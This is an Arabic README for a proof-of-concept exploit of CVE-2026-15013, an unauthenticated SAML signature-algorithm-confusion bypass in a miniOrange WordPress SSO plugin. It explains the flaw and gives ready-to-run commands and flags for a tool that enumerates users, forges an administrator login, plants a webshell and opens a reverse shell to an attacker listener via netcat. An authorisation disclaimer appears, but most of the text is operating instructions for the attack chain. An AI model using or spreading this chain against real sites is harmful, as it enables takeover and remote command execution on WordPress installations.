
استغلال لـ CVE-2026-15013: تجاوز مصادقة SAML بدون مصادقة مسبقة عبر ارتباك الخوارزمية. يزوّر استجابات SAML للحصول على وصول إداري ونشر webshell/reverse shell. للاختبار المصرح به.
إثبات المفهوم لـ CVE-2026-15013: تجاوز مصادقة دون تسجيل دخول عبر التباس خوارزمية التوقيع (HMAC-SHA1) في إضافة ووردبريس SAML Single Sign On – SSO Login من miniOrange (الإصدارات حتى 5.4.3 ضمناً).
للاستخدام في الاختبارات المصرّح بها فقط. استخدم هذا الكود حصرياً على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني.
| الدور | |
|---|---|
| مكتشف الثغرة | lhking (مُنسب إليه في سجل CVE) |
| CVE / CNA | Wordfence |
| هذا المستودع | إعادة إنتاج مخبرية مستقلة / أتمتة إثبات المفهوم (وليس الاكتشاف الأصلي) |
سجل CVE: https://www.cve.org/CVERecord?id=CVE-2026-15013
تثق الدالة Mo_SAML_Utilities::mo_saml_cast_key() بخوارزمية SignatureMethod الواردة في SAMLResponse التي يتحكم بها المهاجم. وعند ضبطها على HMAC-SHA1، تعيد الإضافة تفسير المفتاح العام RSA الخاص بموفّر الهوية (IdP) على أنه سرّ مشترك HMAC وتتحقق من التوقيع به. يمكن لأي شخص يستطيع قراءة شهادة IdP (التي غالباً ما تكون بيانات وصفية عامة) تزوير تأكيد (assertion) صالح لأي مستخدم ووردبريس موجود، بمن فيهم المسؤولون.
تم إصلاحها في 5.4.4+ (الخوارزميات غير الآمنة / HMAC مرفوضة).
9.8 حرجة — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
openssl لسطر الأوامر (لتحويل الشهادة إلى مفتاح عام)ثبّت التبعيات:
pip install -r requirements.txt
السلسلة الكاملة (تعداد المستخدمين، تسجيل دخول HMAC، صلاحيات المسؤول، webshell):
python3 exploit.py -u https://TARGET.example
شل عكسي اختياري (شغّل المستمع أولاً: nc -lvnp 4444):
python3 exploit.py -u https://TARGET.example --lhost YOUR_IP --lport 4444
تسجيل الدخول فقط (بدون شل):
python3 exploit.py -u https://TARGET.example --no-shell
إعدادات يدوية:
python3 exploit.py -u https://TARGET.example \
--issuer https://idp.example/realms/xxx \
--nameid admin \
-k ./idp-pubkey.pem
exp/shell.php?c=id)--lhostهذا المشروع مخصص للأغراض التعليمية وأبحاث الأمن المصرّح بها فقط. لا يتحمل المؤلفون والمساهمون أي مسؤولية عن إساءة الاستخدام. احصل دائماً على إذن كتابي قبل اختبار أنظمة الأطراف الثالثة. تم الإبلاغ عن الثغرة الأصلية عبر الإفصاح المسؤول؛ هذا المستودع يعرض إعادة الإنتاج فقط لأغراض التعلم والتحقق الدفاعي.
للاستخدام البحثي فقط. دون أي ضمان.
| العلامة | الوصف |
|---|
-u, --url | عنوان ووردبريس الأساسي (مطلوب) |
-k, --hmac-key | ملف PEM للمفتاح العام أو الشهادة؛ إذا تُرك فارغاً يتم الجلب من البيانات الوصفية لموفّر الهوية IdP |
--issuer | تجاوز مُصدِر IdP |
--acs | تجاوز عنوان ACS |
--nameid | فرض اسم مستخدم ووردبريس واحد |
--lhost / --lport | استدعاء الشل العكسي (المنفذ الافتراضي 4444) |
--no-shell | التوقف بعد جلسة المسؤول |
--no-reverse | رفع الشل دون تفعيل الاتصال العكسي |